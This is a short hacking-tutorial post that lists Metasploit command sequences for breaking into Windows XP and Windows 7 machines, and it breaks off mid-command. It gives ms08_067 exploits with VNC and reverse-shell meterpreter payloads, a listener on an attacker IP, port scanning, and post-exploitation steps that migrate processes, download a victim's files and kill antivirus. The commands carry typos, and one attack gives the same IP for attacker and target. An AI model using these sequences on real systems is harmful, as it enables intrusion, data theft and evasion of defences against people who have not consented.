Some Metasploit Attacks
Some Metasploit Attacks today i will show you Some metasploit attacks. Requirement:- Backtrack. Metasploit. These are just some commands ,there are lots of options in metasploit. Acoording to vulnarability you can use it. Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control use windows/smb/ms08_067_netapi show optios set RHOST 192.168.1.1 ----->IP target set payload windows/vncinject/bind_tcp exploit Attack 2.Metasploit vs Windows 7 and AVG use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOT 192.168.0.1 ----->IP Attacker set LPORT 5555 exploit ps migrate 1880 cd c: ls download program-7.exe /root run killav shell Attack 3. Hacking By Metasploit . Windows xp Sp3 use windows/smb/ms08_067_netapi set LHOST 192.168.1.1 --->ip attacker set RHOST 192.168.1.1 ----->ip target set payload windows/meterpreter/reverse_tcp exploit Attack 4: Hacking win7 with metasploit nmap -sS -v -PN 192.168.1-255 use ex...